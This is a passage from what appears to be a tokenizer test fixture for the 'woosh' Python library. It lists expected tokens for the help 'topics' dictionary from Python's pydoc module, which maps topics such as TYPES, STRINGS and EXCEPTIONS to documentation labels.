woosh.Token(woosh.DEDENT, '', 1891, 4, 1891, 4),
woosh.Token(woosh.NAME, 'topics', 1891, 4, 1891, 10),
woosh.Token(woosh.OP, '=', 1891, 11, 1891, 12),
woosh.Token(woosh.OP, '{', 1891, 13, 1891, 14),
woosh.Token(woosh.STRING, "'TYPES'", 1892, 8, 1892, 15),
woosh.Token(woosh.OP, ':', 1892, 15, 1892, 16),
woosh.Token(woosh.OP, '(', 1892, 17, 1892, 18),
woosh.Token(woosh.STRING, "'types'", 1892, 18, 1892, 25),
woosh.Token(woosh.OP, ',', 1892, 25, 1892, 26),
woosh.Token(woosh.STRING, "'STRINGS UNICODE NUMBERS SEQUENCES MAPPINGS '", 1892, 27, 1892, 72),
woosh.Token(woosh.STRING, "'FUNCTIONS CLASSES MODULES FILES inspect'", 1893, 18, 1893, 59),
woosh.Token(woosh.OP, ')', 1893, 59, 1893, 60),
woosh.Token(woosh.OP, ',', 1893, 60, 1893, 61),
woosh.Token(woosh.STRING, "'STRINGS'", 1894, 8, 1894, 17),
woosh.Token(woosh.OP, ':', 1894, 17, 1894, 18),
woosh.Token(woosh.OP, '(', 1894, 19, 1894, 20),
woosh.Token(woosh.STRING, "'strings'", 1894, 20, 1894, 29),
woosh.Token(woosh.OP, ',', 1894, 29, 1894, 30),
woosh.Token(woosh.STRING, "'str UNICODE SEQUENCES STRINGMETHODS '", 1894, 31, 1894, 69),
woosh.Token(woosh.STRING, "'FORMATTING TYPES'", 1895, 20, 1895, 38),
woosh.Token(woosh.OP, ')', 1895, 38, 1895, 39),
woosh.Token(woosh.OP, ',', 1895, 39, 1895, 40),
woosh.Token(woosh.STRING, "'STRINGMETHODS'", 1896, 8, 1896, 23),
woosh.Token(woosh.OP, ':', 1896, 23, 1896, 24),
woosh.Token(woosh.OP, '(', 1896, 25, 1896, 26),
woosh.Token(woosh.STRING, "'string-methods'", 1896, 26, 1896, 42),
woosh.Token(woosh.OP, ',', 1896, 42, 1896, 43),
woosh.Token(woosh.STRING, "'STRINGS FORMATTING'", 1896, 44, 1896, 64),
woosh.Token(woosh.OP, ')', 1896, 64, 1896, 65),
woosh.Token(woosh.OP, ',', 1896, 65, 1896, 66),
woosh.Token(woosh.STRING, "'FORMATTING'", 1897, 8, 1897, 20),
woosh.Token(woosh.OP, ':', 1897, 20, 1897, 21),
woosh.Token(woosh.OP, '(', 1897, 22, 1897, 23),
woosh.Token(woosh.STRING, "'formatstrings'", 1897, 23, 1897, 38),
woosh.Token(woosh.OP, ',', 1897, 38, 1897, 39),
woosh.Token(woosh.STRING, "'OPERATORS'", 1897, 40, 1897, 51),
woosh.Token(woosh.OP, ')', 1897, 51, 1897, 52),
woosh.Token(woosh.OP, ',', 1897, 52, 1897, 53),
woosh.Token(woosh.STRING, "'UNICODE'", 1898, 8, 1898, 17),
woosh.Token(woosh.OP, ':', 1898, 17, 1898, 18),
woosh.Token(woosh.OP, '(', 1898, 19, 1898, 20),
woosh.Token(woosh.STRING, "'strings'", 1898, 20, 1898, 29),
woosh.Token(woosh.OP, ',', 1898, 29, 1898, 30),
woosh.Token(woosh.STRING, "'encodings unicode SEQUENCES STRINGMETHODS '", 1898, 31, 1898, 75),
woosh.Token(woosh.STRING, "'FORMATTING TYPES'", 1899, 20, 1899, 38),
woosh.Token(woosh.OP, ')', 1899, 38, 1899, 39),
woosh.Token(woosh.OP, ',', 1899, 39, 1899, 40),
woosh.Token(woosh.STRING, "'NUMBERS'", 1900, 8, 1900, 17),
woosh.Token(woosh.OP, ':', 1900, 17, 1900, 18),
woosh.Token(woosh.OP, '(', 1900, 19, 1900, 20),
woosh.Token(woosh.STRING, "'numbers'", 1900, 20, 1900, 29),
woosh.Token(woosh.OP, ',', 1900, 29, 1900, 30),
woosh.Token(woosh.STRING, "'INTEGER FLOAT COMPLEX TYPES'", 1900, 31, 1900, 60),
woosh.Token(woosh.OP, ')', 1900, 60, 1900, 61),
woosh.Token(woosh.OP, ',', 1900, 61, 1900, 62),
woosh.Token(woosh.STRING, "'INTEGER'", 1901, 8, 1901, 17),
woosh.Token(woosh.OP, ':', 1901, 17, 1901, 18),
woosh.Token(woosh.OP, '(', 1901, 19, 1901, 20),
woosh.Token(woosh.STRING, "'integers'", 1901, 20, 1901, 30),
woosh.Token(woosh.OP, ',', 1901, 30, 1901, 31),
woosh.Token(woosh.STRING, "'int range'", 1901, 32, 1901, 43),
woosh.Token(woosh.OP, ')', 1901, 43, 1901, 44),
woosh.Token(woosh.OP, ',', 1901, 44, 1901, 45),
woosh.Token(woosh.STRING, "'FLOAT'", 1902, 8, 1902, 15),
woosh.Token(woosh.OP, ':', 1902, 15, 1902, 16),
woosh.Token(woosh.OP, '(', 1902, 17, 1902, 18),
woosh.Token(woosh.STRING, "'floating'", 1902, 18, 1902, 28),
woosh.Token(woosh.OP, ',', 1902, 28, 1902, 29),
woosh.Token(woosh.STRING, "'float math'", 1902, 30, 1902, 42),
woosh.Token(woosh.OP, ')', 1902, 42, 1902, 43),
woosh.Token(woosh.OP, ',', 1902, 43, 1902, 44),
woosh.Token(woosh.STRING, "'COMPLEX'", 1903, 8, 1903, 17),
woosh.Token(woosh.OP, ':', 1903, 17, 1903, 18),
woosh.Token(woosh.OP, '(', 1903, 19, 1903, 20),
woosh.Token(woosh.STRING, "'imaginary'", 1903, 20, 1903, 31),
woosh.Token(woosh.OP, ',', 1903, 31, 1903, 32),
woosh.Token(woosh.STRING, "'complex cmath'", 1903, 33, 1903, 48),
woosh.Token(woosh.OP, ')', 1903, 48, 1903, 49),
woosh.Token(woosh.OP, ',', 1903, 49, 1903, 50),
woosh.Token(woosh.STRING, "'SEQUENCES'", 1904, 8, 1904, 19),
woosh.Token(woosh.OP, ':', 1904, 19, 1904, 20),
woosh.Token(woosh.OP, '(', 1904, 21, 1904, 22),
woosh.Token(woosh.STRING, "'typesseq'", 1904, 22, 1904, 32),
woosh.Token(woosh.OP, ',', 1904, 32, 1904, 33),
woosh.Token(woosh.STRING, "'STRINGMETHODS FORMATTING range LISTS'", 1904, 34, 1904, 72),
woosh.Token(woosh.OP, ')', 1904, 72, 1904, 73),
woosh.Token(woosh.OP, ',', 1904, 73, 1904, 74),
woosh.Token(woosh.STRING, "'MAPPINGS'", 1905, 8, 1905, 18),
woosh.Token(woosh.OP, ':', 1905, 18, 1905, 19),
woosh.Token(woosh.STRING, "'DICTIONARIES'", 1905, 20, 1905, 34),
woosh.Token(woosh.OP, ',', 1905, 34, 1905, 35),
woosh.Token(woosh.STRING, "'FUNCTIONS'", 1906, 8, 1906, 19),
woosh.Token(woosh.OP, ':', 1906, 19, 1906, 20),
woosh.Token(woosh.OP, '(', 1906, 21, 1906, 22),
woosh.Token(woosh.STRING, "'typesfunctions'", 1906, 22, 1906, 38),
woosh.Token(woosh.OP, ',', 1906, 38, 1906, 39),
woosh.Token(woosh.STRING, "'def TYPES'", 1906, 40, 1906, 51),
woosh.Token(woosh.OP, ')', 1906, 51, 1906, 52),
woosh.Token(woosh.OP, ',', 1906, 52, 1906, 53),
woosh.Token(woosh.STRING, "'METHODS'", 1907, 8, 1907, 17),
woosh.Token(woosh.OP, ':', 1907, 17, 1907, 18),
woosh.Token(woosh.OP, '(', 1907, 19, 1907, 20),
woosh.Token(woosh.STRING, "'typesmethods'", 1907, 20, 1907, 34),
woosh.Token(woosh.OP, ',', 1907, 34, 1907, 35),
woosh.Token(woosh.STRING, "'class def CLASSES TYPES'", 1907, 36, 1907, 61),
woosh.Token(woosh.OP, ')', 1907, 61, 1907, 62),
woosh.Token(woosh.OP, ',', 1907, 62, 1907, 63),
woosh.Token(woosh.STRING, "'CODEOBJECTS'", 1908, 8, 1908, 21),
woosh.Token(woosh.OP, ':', 1908, 21, 1908, 22),
woosh.Token(woosh.OP, '(', 1908, 23, 1908, 24),
woosh.Token(woosh.STRING, "'bltin-code-objects'", 1908, 24, 1908, 44),
woosh.Token(woosh.OP, ',', 1908, 44, 1908, 45),
woosh.Token(woosh.STRING, "'compile FUNCTIONS TYPES'", 1908, 46, 1908, 71),
woosh.Token(woosh.OP, ')', 1908, 71, 1908, 72),
woosh.Token(woosh.OP, ',', 1908, 72, 1908, 73),
woosh.Token(woosh.STRING, "'TYPEOBJECTS'", 1909, 8, 1909, 21),
woosh.Token(woosh.OP, ':', 1909, 21, 1909, 22),
woosh.Token(woosh.OP, '(', 1909, 23, 1909, 24),
woosh.Token(woosh.STRING, "'bltin-type-objects'", 1909, 24, 1909, 44),
woosh.Token(woosh.OP, ',', 1909, 44, 1909, 45),
woosh.Token(woosh.STRING, "'types TYPES'", 1909, 46, 1909, 59),
woosh.Token(woosh.OP, ')', 1909, 59, 1909, 60),
woosh.Token(woosh.OP, ',', 1909, 60, 1909, 61),
woosh.Token(woosh.STRING, "'FRAMEOBJECTS'", 1910, 8, 1910, 22),
woosh.Token(woosh.OP, ':', 1910, 22, 1910, 23),
woosh.Token(woosh.STRING, "'TYPES'", 1910, 24, 1910, 31),
woosh.Token(woosh.OP, ',', 1910, 31, 1910, 32),
woosh.Token(woosh.STRING, "'TRACEBACKS'", 1911, 8, 1911, 20),
woosh.Token(woosh.OP, ':', 1911, 20, 1911, 21),
woosh.Token(woosh.STRING, "'TYPES'", 1911, 22, 1911, 29),
woosh.Token(woosh.OP, ',', 1911, 29, 1911, 30),
woosh.Token(woosh.STRING, "'NONE'", 1912, 8, 1912, 14),
woosh.Token(woosh.OP, ':', 1912, 14, 1912, 15),
woosh.Token(woosh.OP, '(', 1912, 16, 1912, 17),
woosh.Token(woosh.STRING, "'bltin-null-object'", 1912, 17, 1912, 36),
woosh.Token(woosh.OP, ',', 1912, 36, 1912, 37),
woosh.Token(woosh.STRING, "''", 1912, 38, 1912, 40),
woosh.Token(woosh.OP, ')', 1912, 40, 1912, 41),
woosh.Token(woosh.OP, ',', 1912, 41, 1912, 42),
woosh.Token(woosh.STRING, "'ELLIPSIS'", 1913, 8, 1913, 18),
woosh.Token(woosh.OP, ':', 1913, 18, 1913, 19),
woosh.Token(woosh.OP, '(', 1913, 20, 1913, 21),
woosh.Token(woosh.STRING, "'bltin-ellipsis-object'", 1913, 21, 1913, 44),
woosh.Token(woosh.OP, ',', 1913, 44, 1913, 45),
woosh.Token(woosh.STRING, "'SLICINGS'", 1913, 46, 1913, 56),
woosh.Token(woosh.OP, ')', 1913, 56, 1913, 57),
woosh.Token(woosh.OP, ',', 1913, 57, 1913, 58),
woosh.Token(woosh.STRING, "'SPECIALATTRIBUTES'", 1914, 8, 1914, 27),
woosh.Token(woosh.OP, ':', 1914, 27, 1914, 28),
woosh.Token(woosh.OP, '(', 1914, 29, 1914, 30),
woosh.Token(woosh.STRING, "'specialattrs'", 1914, 30, 1914, 44),
woosh.Token(woosh.OP, ',', 1914, 44, 1914, 45),
woosh.Token(woosh.STRING, "''", 1914, 46, 1914, 48),
woosh.Token(woosh.OP, ')', 1914, 48, 1914, 49),
woosh.Token(woosh.OP, ',', 1914, 49, 1914, 50),
woosh.Token(woosh.STRING, "'CLASSES'", 1915, 8, 1915, 17),
woosh.Token(woosh.OP, ':', 1915, 17, 1915, 18),
woosh.Token(woosh.OP, '(', 1915, 19, 1915, 20),
woosh.Token(woosh.STRING, "'types'", 1915, 20, 1915, 27),
woosh.Token(woosh.OP, ',', 1915, 27, 1915, 28),
woosh.Token(woosh.STRING, "'class SPECIALMETHODS PRIVATENAMES'", 1915, 29, 1915, 64),
woosh.Token(woosh.OP, ')', 1915, 64, 1915, 65),
woosh.Token(woosh.OP, ',', 1915, 65, 1915, 66),
woosh.Token(woosh.STRING, "'MODULES'", 1916, 8, 1916, 17),
woosh.Token(woosh.OP, ':', 1916, 17, 1916, 18),
woosh.Token(woosh.OP, '(', 1916, 19, 1916, 20),
woosh.Token(woosh.STRING, "'typesmodules'", 1916, 20, 1916, 34),
woosh.Token(woosh.OP, ',', 1916, 34, 1916, 35),
woosh.Token(woosh.STRING, "'import'", 1916, 36, 1916, 44),
woosh.Token(woosh.OP, ')', 1916, 44, 1916, 45),
woosh.Token(woosh.OP, ',', 1916, 45, 1916, 46),
woosh.Token(woosh.STRING, "'PACKAGES'", 1917, 8, 1917, 18),
woosh.Token(woosh.OP, ':', 1917, 18, 1917, 19),
woosh.Token(woosh.STRING, "'import'", 1917, 20, 1917, 28),
woosh.Token(woosh.OP, ',', 1917, 28, 1917, 29),
woosh.Token(woosh.STRING, "'EXPRESSIONS'", 1918, 8, 1918, 21),
woosh.Token(woosh.OP, ':', 1918, 21, 1918, 22),
woosh.Token(woosh.OP, '(', 1918, 23, 1918, 24),
woosh.Token(woosh.STRING, "'operator-summary'", 1918, 24, 1918, 42),
woosh.Token(woosh.OP, ',', 1918, 42, 1918, 43),
woosh.Token(woosh.STRING, "'lambda or and not in is BOOLEAN '", 1918, 44, 1918, 78),
woosh.Token(woosh.STRING, "'COMPARISON BITWISE SHIFTING BINARY FORMATTING POWER '", 1919, 24, 1919, 78),
woosh.Token(woosh.STRING, "'UNARY ATTRIBUTES SUBSCRIPTS SLICINGS CALLS TUPLES '", 1920, 24, 1920, 76),
woosh.Token(woosh.STRING, "'LISTS DICTIONARIES'", 1921, 24, 1921, 44),
woosh.Token(woosh.OP, ')', 1921, 44, 1921, 45),
woosh.Token(woosh.OP, ',', 1921, 45, 1921, 46),
woosh.Token(woosh.STRING, "'OPERATORS'", 1922, 8, 1922, 19),
woosh.Token(woosh.OP, ':', 1922, 19, 1922, 20),
woosh.Token(woosh.STRING, "'EXPRESSIONS'", 1922, 21, 1922, 34),
woosh.Token(woosh.OP, ',', 1922, 34, 1922, 35),
woosh.Token(woosh.STRING, "'PRECEDENCE'", 1923, 8, 1923, 20),
woosh.Token(woosh.OP, ':', 1923, 20, 1923, 21),
woosh.Token(woosh.STRING, "'EXPRESSIONS'", 1923, 22, 1923, 35),
woosh.Token(woosh.OP, ',', 1923, 35, 1923, 36),
woosh.Token(woosh.STRING, "'OBJECTS'", 1924, 8, 1924, 17),
woosh.Token(woosh.OP, ':', 1924, 17, 1924, 18),
woosh.Token(woosh.OP, '(', 1924, 19, 1924, 20),
woosh.Token(woosh.STRING, "'objects'", 1924, 20, 1924, 29),
woosh.Token(woosh.OP, ',', 1924, 29, 1924, 30),
woosh.Token(woosh.STRING, "'TYPES'", 1924, 31, 1924, 38),
woosh.Token(woosh.OP, ')', 1924, 38, 1924, 39),
woosh.Token(woosh.OP, ',', 1924, 39, 1924, 40),
woosh.Token(woosh.STRING, "'SPECIALMETHODS'", 1925, 8, 1925, 24),
woosh.Token(woosh.OP, ':', 1925, 24, 1925, 25),
woosh.Token(woosh.OP, '(', 1925, 26, 1925, 27),
woosh.Token(woosh.STRING, "'specialnames'", 1925, 27, 1925, 41),
woosh.Token(woosh.OP, ',', 1925, 41, 1925, 42),
woosh.Token(woosh.STRING, "'BASICMETHODS ATTRIBUTEMETHODS '", 1925, 43, 1925, 75),
woosh.Token(woosh.STRING, "'CALLABLEMETHODS SEQUENCEMETHODS MAPPINGMETHODS '", 1926, 27, 1926, 76),
woosh.Token(woosh.STRING, "'NUMBERMETHODS CLASSES'", 1927, 27, 1927, 50),
woosh.Token(woosh.OP, ')', 1927, 50, 1927, 51),
woosh.Token(woosh.OP, ',', 1927, 51, 1927, 52),
woosh.Token(woosh.STRING, "'BASICMETHODS'", 1928, 8, 1928, 22),
woosh.Token(woosh.OP, ':', 1928, 22, 1928, 23),
woosh.Token(woosh.OP, '(', 1928, 24, 1928, 25),
woosh.Token(woosh.STRING, "'customization'", 1928, 25, 1928, 40),
woosh.Token(woosh.OP, ',', 1928, 40, 1928, 41),
woosh.Token(woosh.STRING, "'hash repr str SPECIALMETHODS'", 1928, 42, 1928, 72),
woosh.Token(woosh.OP, ')', 1928, 72, 1928, 73),
woosh.Token(woosh.OP, ',', 1928, 73, 1928, 74),
woosh.Token(woosh.STRING, "'ATTRIBUTEMETHODS'", 1929, 8, 1929, 26),
woosh.Token(woosh.OP, ':', 1929, 26, 1929, 27),
woosh.Token(woosh.OP, '(', 1929, 28, 1929, 29),
woosh.Token(woosh.STRING, "'attribute-access'", 1929, 29, 1929, 47),
woosh.Token(woosh.OP, ',', 1929, 47, 1929, 48),
woosh.Token(woosh.STRING, "'ATTRIBUTES SPECIALMETHODS'", 1929, 49, 1929, 76),
woosh.Token(woosh.OP, ')', 1929, 76, 1929, 77),
woosh.Token(woosh.OP, ',', 1929, 77, 1929, 78),
woosh.Token(woosh.STRING, "'CALLABLEMETHODS'", 1930, 8, 1930, 25),
woosh.Token(woosh.OP, ':', 1930, 25, 1930, 26),
woosh.Token(woosh.OP, '(', 1930, 27, 1930, 28),
woosh.Token(woosh.STRING, "'callable-types'", 1930, 28, 1930, 44),
woosh.Token(woosh.OP, ',', 1930, 44, 1930, 45),
woosh.Token(woosh.STRING, "'CALLS SPECIALMETHODS'", 1930, 46, 1930, 68),
woosh.Token(woosh.OP, ')', 1930, 68, 1930, 69),
woosh.Token(woosh.OP, ',', 1930, 69, 1930, 70),
woosh.Token(woosh.STRING, "'SEQUENCEMETHODS'", 1931, 8, 1931, 25),
woosh.Token(woosh.OP, ':', 1931, 25, 1931, 26),
woosh.Token(woosh.OP, '(', 1931, 27, 1931, 28),
woosh.Token(woosh.STRING, "'sequence-types'", 1931, 28, 1931, 44),
woosh.Token(woosh.OP, ',', 1931, 44, 1931, 45),
woosh.Token(woosh.STRING, "'SEQUENCES SEQUENCEMETHODS '", 1931, 46, 1931, 74),
woosh.Token(woosh.STRING, "'SPECIALMETHODS'", 1932, 29, 1932, 45),
woosh.Token(woosh.OP, ')', 1932, 45, 1932, 46),
woosh.Token(woosh.OP, ',', 1932, 46, 1932, 47),
woosh.Token(woosh.STRING, "'MAPPINGMETHODS'", 1933, 8, 1933, 24),
woosh.Token(woosh.OP, ':', 1933, 24, 1933, 25),
woosh.Token(woosh.OP, '(', 1933, 26, 1933, 27),
woosh.Token(woosh.STRING, "'sequence-types'", 1933, 27, 1933, 43),
woosh.Token(woosh.OP, ',', 1933, 43, 1933, 44),
woosh.Token(woosh.STRING, "'MAPPINGS SPECIALMETHODS'", 1933, 45, 1933, 70),
woosh.Token(woosh.OP, ')', 1933, 70, 1933, 71),
woosh.Token(woosh.OP, ',', 1933, 71, 1933, 72),
woosh.Token(woosh.STRING, "'NUMBERMETHODS'", 1934, 8, 1934, 23),
woosh.Token(woosh.OP, ':', 1934, 23, 1934, 24),
woosh.Token(woosh.OP, '(', 1934, 25, 1934, 26),
woosh.Token(woosh.STRING, "'numeric-types'", 1934, 26, 1934, 41),
woosh.Token(woosh.OP, ',', 1934, 41, 1934, 42),
woosh.Token(woosh.STRING, "'NUMBERS AUGMENTEDASSIGNMENT '", 1934, 43, 1934, 73),
woosh.Token(woosh.STRING, "'SPECIALMETHODS'", 1935, 26, 1935, 42),
woosh.Token(woosh.OP, ')', 1935, 42, 1935, 43),
woosh.Token(woosh.OP, ',', 1935, 43, 1935, 44),
woosh.Token(woosh.STRING, "'EXECUTION'", 1936, 8, 1936, 19),
woosh.Token(woosh.OP, ':', 1936, 19, 1936, 20),
woosh.Token(woosh.OP, '(', 1936, 21, 1936, 22),
woosh.Token(woosh.STRING, "'execmodel'", 1936, 22, 1936, 33),
woosh.Token(woosh.OP, ',', 1936, 33, 1936, 34),
woosh.Token(woosh.STRING, "'NAMESPACES DYNAMICFEATURES EXCEPTIONS'", 1936, 35, 1936, 74),
woosh.Token(woosh.OP, ')', 1936, 74, 1936, 75),
woosh.Token(woosh.OP, ',', 1936, 75, 1936, 76),
woosh.Token(woosh.STRING, "'NAMESPACES'", 1937, 8, 1937, 20),
woosh.Token(woosh.OP, ':', 1937, 20, 1937, 21),
woosh.Token(woosh.OP, '(', 1937, 22, 1937, 23),
woosh.Token(woosh.STRING, "'naming'", 1937, 23, 1937, 31),
woosh.Token(woosh.OP, ',', 1937, 31, 1937, 32),
woosh.Token(woosh.STRING, "'global nonlocal ASSIGNMENT DELETION DYNAMICFEATURES'", 1937, 33, 1937, 86),
woosh.Token(woosh.OP, ')', 1937, 86, 1937, 87),
woosh.Token(woosh.OP, ',', 1937, 87, 1937, 88),
woosh.Token(woosh.STRING, "'DYNAMICFEATURES'", 1938, 8, 1938, 25),
woosh.Token(woosh.OP, ':', 1938, 25, 1938, 26),
woosh.Token(woosh.OP, '(', 1938, 27, 1938, 28),
woosh.Token(woosh.STRING, "'dynamic-features'", 1938, 28, 1938, 46),
woosh.Token(woosh.OP, ',', 1938, 46, 1938, 47),
woosh.Token(woosh.STRING, "''", 1938, 48, 1938, 50),
woosh.Token(woosh.OP, ')', 1938, 50, 1938, 51),
woosh.Token(woosh.OP, ',', 1938, 51, 1938, 52),
woosh.Token(woosh.STRING, "'SCOPING'", 1939, 8, 1939, 17),
woosh.Token(woosh.OP, ':', 1939, 17, 1939, 18),
woosh.Token(woosh.STRING, "'NAMESPACES'", 1939, 19, 1939, 31),
woosh.Token(woosh.OP, ',', 1939, 31, 1939, 32),
woosh.Token(woosh.STRING, "'FRAMES'", 1940, 8, 1940, 16),
woosh.Token(woosh.OP, ':', 1940, 16, 1940, 17),
woosh.Token(woosh.STRING, "'NAMESPACES'", 1940, 18, 1940, 30),
woosh.Token(woosh.OP, ',', 1940, 30, 1940, 31),
woosh.Token(woosh.STRING, "'EXCEPTIONS'", 1941, 8, 1941, 20),
woosh.Token(woosh.OP, ':', 1941, 20, 1941, 21),
woosh.Token(woosh.OP, '(', 1941, 22, 1941, 23),
woosh.Token(woosh.STRING, "'exceptions'", 1941, 23, 1941, 35),
woosh.Token(woosh.OP, ',', 1941, 35, 1941, 36),
woosh.Token(woosh.STRING, "'try except finally raise'", 1941, 37, 1941, 63),
woosh.Token(woosh.OP, ')', 1941, 63, 1941, 64),
woosh.Token(woosh.OP, ',', 1941, 64, 1941, 65),
woosh.Token(woosh.STRING, "'CONVERSIONS'", 1942, 8, 1942, 21),
woosh.Token(woosh.OP, ':', 1942, 21, 1942, 22),
woosh.Token(woosh.OP, '(', 1942, 23, 1942, 24),
woosh.Token(woosh.STRING, "'conversions'", 1942, 24, 1942, 37),
woosh.Token(woosh.OP, ',', 1942, 37, 1942, 38),
woosh.Token(woosh.STRING, "''", 1942, 39, 1942, 41),
woosh.Token(woosh.OP, ')', 1942, 41, 1942, 42),
woosh.Token(woosh.OP, ',', 1942, 42, 1942, 43),
woosh.Token(woosh.STRING, "'IDENTIFIERS'", 1943, 8, 1943, 21),
woosh.Token(woosh.OP, ':', 1943, 21, 1943, 22),
woosh.Token(woosh.OP, '(', 1943, 23, 1943, 24),
woosh.Token(woosh.STRING, "'identifiers'", 1943, 24, 1943, 37),
woosh.Token(woosh.OP, ',', 1943, 37, 1943, 38),
woosh.Token(woosh.STRING, "'keywords SPECIALIDENTIFIERS'", 1943, 39, 1943, 68),
woosh.Token(woosh.OP, ')', 1943, 68, 1943, 69),
woosh.Token(woosh.OP, ',', 1943, 69, 1943, 70),
woosh.Token(woosh.STRING, "'SPECIALIDENTIFIERS'", 1944, 8, 1944, 28),
woosh.Token(woosh.OP, ':', 1944, 28, 1944, 29),
woosh.Token(woosh.OP, '(', 1944, 30, 1944, 31),
woosh.Token(woosh.STRING, "'id-classes'", 1944, 31, 1944, 43),
woosh.Token(woosh.OP, ',', 1944, 43, 1944, 44),
woosh.Token(woosh.STRING, "''", 1944, 45, 1944, 47),
woosh.Token(woosh.OP, ')', 1944, 47, 1944, 48),
woosh.Token(woosh.OP, ',', 1944, 48, 1944, 49),
woosh.Token(woosh.STRING, "'PRIVATENAMES'", 1945, 8, 1945, 22),
woosh.Token(woosh.OP, ':', 1945, 22, 1945, 23),
woosh.Token(woosh.OP, '(', 1945, 24, 1945, 25),
woosh.Token(woosh.STRING, "'atom-identifiers'", 1945, 25, 1945, 43),
woosh.Token(woosh.OP, ',', 1945, 43, 1945, 44),
woosh.Token(woosh.STRING, "''", 1945, 45, 1945, 47),
woosh.Token(woosh.OP, ')', 1945, 47, 1945, 48),
woosh.Token(woosh.OP, ',', 1945, 48, 1945, 49),
woosh.Token(woosh.STRING, "'LITERALS'", 1946, 8, 1946, 18),
woosh.Token(woosh.OP, ':', 1946, 18, 1946, 19),
woosh.Token(woosh.OP, '(', 1946, 20, 1946, 21),
woosh.Token(woosh.STRING, "'atom-literals'", 1946, 21, 1946, 36),
woosh.Token(woosh.OP, ',', 1946, 36, 1946, 37),
woosh.Token(woosh.STRING, "'STRINGS NUMBERS TUPLELITERALS '", 1946, 38, 1946, 70),
woosh.Token(woosh.STRING, "'LISTLITERALS DICTIONARYLITERALS'", 1947, 21, 1947, 54),
woosh.Token(woosh.OP, ')', 1947, 54, 1947, 55),
woosh.Token(woosh.OP, ',', 1947, 55, 1947, 56),
woosh.Token(woosh.STRING, "'TUPLES'", 1948, 8, 1948, 16),
woosh.Token(woosh.OP, ':', 1948, 16, 1948, 17),
woosh.Token(woosh.STRING, "'SEQUENCES'", 1948, 18, 1948, 29),
woosh.Token(woosh.OP, ',', 1948, 29, 1948, 30),
woosh.Token(woosh.STRING, "'TUPLELITERALS'", 1949, 8, 1949, 23),
woosh.Token(woosh.OP, ':', 1949, 23, 1949, 24),
woosh.Token(woosh.OP, '(', 1949, 25, 1949, 26),
woosh.Token(woosh.STRING, "'exprlists'", 1949, 26, 1949, 37),
woosh.Token(woosh.OP, ',', 1949, 37, 1949, 38),
woosh.Token(woosh.STRING, "'TUPLES LITERALS'", 1949, 39, 1949, 56),
woosh.Token(woosh.OP, ')', 1949, 56, 1949, 57),
woosh.Token(woosh.OP, ',', 1949, 57, 1949, 58),
woosh.Token(woosh.STRING, "'LISTS'", 1950, 8, 1950, 15),
woosh.Token(woosh.OP, ':', 1950, 15, 1950, 16),
woosh.Token(woosh.OP, '(', 1950, 17, 1950, 18),
woosh.Token(woosh.STRING, "'typesseq-mutable'", 1950, 18, 1950, 36),
woosh.Token(woosh.OP, ',', 1950, 36, 1950, 37),
woosh.Token(woosh.STRING, "'LISTLITERALS'", 1950, 38, 1950, 52),
woosh.Token(woosh.OP, ')', 1950, 52, 1950, 53),
woosh.Token(woosh.OP, ',', 1950, 53, 1950, 54),
woosh.Token(woosh.STRING, "'LISTLITERALS'", 1951, 8, 1951, 22),
woosh.Token(woosh.OP, ':', 1951, 22, 1951, 23),
woosh.Token(woosh.OP, '(', 1951, 24, 1951, 25),
woosh.Token(woosh.STRING, "'lists'", 1951, 25, 1951, 32),
woosh.Token(woosh.OP, ',', 1951, 32, 1951, 33),
woosh.Token(woosh.STRING, "'LISTS LITERALS'", 1951, 34, 1951, 50),
woosh.Token(woosh.OP, ')', 1951, 50, 1951, 51),
woosh.Token(woosh.OP, ',', 1951, 51, 1951, 52),
woosh.Token(woosh.STRING, "'DICTIONARIES'", 1952, 8, 1952, 22),
woosh.Token(woosh.OP, ':', 1952, 22, 1952, 23),
woosh.Token(woosh.OP, '(', 1952, 24, 1952, 25),
woosh.Token(woosh.STRING, "'typesmapping'", 1952, 25, 1952, 39),
woosh.Token(woosh.OP, ',', 1952, 39, 1952, 40),
woosh.Token(woosh.STRING, "'DICTIONARYLITERALS'", 1952, 41, 1952, 61),
woosh.Token(woosh.OP, ')', 1952, 61, 1952, 62),
woosh.Token(woosh.OP, ',', 1952, 62, 1952, 63),
woosh.Token(woosh.STRING, "'DICTIONARYLITERALS'", 1953, 8, 1953, 28),
woosh.Token(woosh.OP, ':', 1953, 28, 1953, 29),
woosh.Token(woosh.OP, '(', 1953, 30, 1953, 31),
woosh.Token(woosh.STRING, "'dict'", 1953, 31, 1953, 37),
woosh.Token(woosh.OP, ',', 1953, 37, 1953, 38),
woosh.Token(woosh.STRING, "'DICTIONARIES LITERALS'", 1953, 39, 1953, 62),
woosh.Token(woosh.OP, ')', 1953, 62, 1953, 63),
woosh.Token(woosh.OP, ',', 1953, 63, 1953, 64),
woosh.Token(woosh.STRING, "'ATTRIBUTES'", 1954, 8, 1954, 20),
woosh.Token(woosh.OP, ':', 1954, 20, 1954, 21),
woosh.Token(woosh.OP, '(', 1954, 22, 1954, 23),
woosh.Token(woosh.STRING, "'attribute-references'", 1954, 23, 1954, 45),
woosh.Token(woosh.OP, ',', 1954, 45, 1954, 46),
woosh.Token(woosh.STRING, "'getattr hasattr setattr ATTRIBUTEMETHODS'", 1954, 47, 1954, 89),
woosh.Token(woosh.OP, ')', 1954, 89, 1954, 90),
woosh.Token(woosh.OP, ',', 1954, 90, 1954, 91),
woosh.Token(woosh.STRING, "'SUBSCRIPTS'", 1955, 8, 1955, 20),
woosh.Token(woosh.OP, ':', 1955, 20, 1955, 21),
woosh.Token(woosh.OP, '(', 1955, 22, 1955, 23),
woosh.Token(woosh.STRING, "'subscriptions'", 1955, 23, 1955, 38),
woosh.Token(woosh.OP, ',', 1955, 38, 1955, 39),
woosh.Token(woosh.STRING, "'SEQUENCEMETHODS'", 1955, 40, 1955, 57),
woosh.Token(woosh.OP, ')', 1955, 57, 1955, 58),
woosh.Token(woosh.OP, ',', 1955, 58, 1955, 59),
woosh.Token(woosh.STRING, "'SLICINGS'", 1956, 8, 1956, 18),
woosh.Token(woosh.OP, ':', 1956, 18, 1956, 19),
woosh.Token(woosh.OP, '(', 1956, 20, 1956, 21),
woosh.Token(woosh.STRING, "'slicings'", 1956, 21, 1956, 31),
woosh.Token(woosh.OP, ',', 1956, 31, 1956, 32),
woosh.Token(woosh.STRING, "'SEQUENCEMETHODS'", 1956, 33, 1956, 50),
woosh.Token(woosh.OP, ')', 1956, 50, 1956, 51),
woosh.Token(woosh.OP, ',', 1956, 51, 1956, 52),
woosh.Token(woosh.STRING, "'CALLS'", 1957, 8, 1957, 15),
woosh.Token(woosh.OP, ':', 1957, 15, 1957, 16),
